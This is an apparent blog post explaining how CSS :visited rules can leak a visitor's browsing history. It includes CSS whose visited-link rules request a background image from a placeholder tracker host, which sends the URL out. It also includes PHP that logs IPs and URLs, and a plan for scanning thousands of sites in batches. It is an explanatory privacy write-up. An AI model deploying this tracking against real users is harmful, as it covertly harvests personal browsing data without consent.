Connect with us

Sniffing Browser History with CSS

coding

Sniffing Browser History with CSS

Sniffing Browser History with CSS

I know that it might sound weird, but it is possible using basic logic in CSS (Cascading Style Sheets) to query a browser to whether a visitor has visited another web page. More generally, it shows that even simple logic in technology has the possibility of being exploited. Although the data used in this example seems rather unimportant, when used to profile a user’s likes and dislikes, for example, it quickly turns from “data” to personal information.

 

The CSS Logic

Fundamentally, this PoC relies on pure CSS. Take, for example, the following CSS…

#link1 {
color: blue;
}
#link1:visited {
color: red;
}

…applied to this:

<a id="link1" href="http://google.com/">Visit Google!</a>

From the above, you can deduce that “Visit Google!” will show up blue, by default; the exception to this is when the visitor has visited http://google.com/: the link will show up red. Seems innocent enough, right?

Consider, instead, this:

#link1 {
color: blue;
}
#link1:visited {
color: red;
background: url(http://trackersite.ext/track.php?url=google.com);
}
<a id="link1" href="http://google.com/">Visit Google!</a>

As before, the link will show up blue by default. If the user has visited http://google.com/, it will show up red. However, it also displays a background image for the link. Obviously, to get the background image, the browser has to request it from the server — in doing this, it innocently sends additional information along with the request: ?url=google.com.

The Server Side Code

You have probably noticed that the background image doesn’t go to an actual image: .png, .gif, etc. Instead, it loads a PHP script. This script has the potential to log the sites a user has visited. Consider the following PHP:

<?php
/* ... */
$ip = $_SERVER["REMOTE_ADDR"]; // the user's IP address
$url = $_GET["url"]; // the URL they have visited
 
// log the information in the database table
mysql_query("INSERT INTO trackdb.log (ip, url) VALUES
(\"" . mysql_real_escape_string($ip) . "\",
\"" . mysql_real_escape_string($url) . "\")");
?>

Querying the browser…

Now that we know how to query the browser for one link, we can do it for many links:

#link1:visited {
background: url(http://trackersite.ext/track.php?url=google.com);
}
#link2:visited {
background: url(http://trackersite.ext/track.php?url=yahoo.com);
}
#link3:visited {
background: url(http://trackersite.ext/track.php?url=amazon.com);
}
#link4:visited {
background: url(http://trackersite.ext/track.php?url=php.net);
}
/* etc */
<a id="link1" href="http://google.com/">a</a>
<a id="link2" href="http://yahoo.com/">a</a>
<a id="link3" href="http://amazon.com/">a</a>
<a id="link4" href="http://php.net/">a</a>
<!-- etc -->

And it’s that easy! Just put thousands of links in, and you have the ability to find hundreds of pages that a user has visited.

In order to check thousands of links, it uses publicly available data from Alexa and Yahoo! API.

Firstly, it scans for website homepages, as provided by Alexa. So http://google.com/, http://yahoo.com/, http://msn.com/, etc. It logs any visit to the server.

Secondly, it scans for individual site pages, such as http://google.com/cookies.html, http://google.com/adsense/, http://yahoo.com/uk/, etc. It will only scan a site’s pages if the site’s homepage was visited (ie, http://google.com/cookies.html will not be queried if http://google.com/ was not visited). To get the list of a site’s pages, it simply does a site:domain.ext query via the Yahoo! API.

Because it can detect 40 million pages, theoretically, it performs querying in “batch mode”: it might check 2,000 pages, and then use a META refresh to scan the next 2,000, and so on.

It could also use AJAX with Javascript to load lists, rather than using Iframes and refreshes.

The Implications

This exploit currently has the potential to be used in tracking website visitor’s likes and dislikes. This could then in turn be used to display advertisements targeted towards the user. For example, if you know a user has been visiting car-related web pages, you could display an advert for cars, which is likely to get a higher CTR (or click-through probability) than an advert for gardening equipment (unless they also visited sites related to this).

Naturally, many people will consider this information personal when used in this way, and are concerned about how the data is and could be used. Browsers and plugins are likely to reduce the effect of this exploit. (Firefox will be coming with an option to disable the :visited selector)

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in coding

To Top